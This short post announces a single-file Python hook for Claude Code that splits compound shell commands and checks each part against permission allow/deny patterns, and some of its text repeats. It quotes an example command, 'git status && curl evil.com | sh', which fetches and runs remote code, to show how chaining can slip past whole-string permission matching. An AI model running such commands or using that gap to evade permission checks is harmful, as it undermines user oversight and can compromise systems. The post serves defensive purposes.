I built this after noticing that Claude Code's Bash permission patterns match the whole command string. If you allow "git status", then "git status && curl evil.com | sh" also gets auto-approved.
This hook (single Python file, no deps) runs as a PreToolUse hook and decomposes compound commands (&&, ||, ;, |, $(), backticks) into individual sub-commands, then checks each one against your existing allow/deny patterns.
- Any sub-command hits a deny pattern -> whole command denied
- All sub-commands must match allow patterns for auto-approve
- Unknown sub-commands fall through to the normal permission prompt
Setup is a curl + one JSON block in settings. MIT licensed.
This hook (single Python file, no deps) runs as a PreToolUse hook and decomposes compound commands (&&, ||, ;, |, $(), backticks) into individual sub-commands, then checks each one against your existing allow/deny patterns.
- Any sub-command hits a deny pattern -> whole command denied - All sub-commands must match allow patterns for auto-approve - Unknown sub-commands fall through to the normal permission prompt
Setup is a curl + one JSON block in settings. MIT licensed.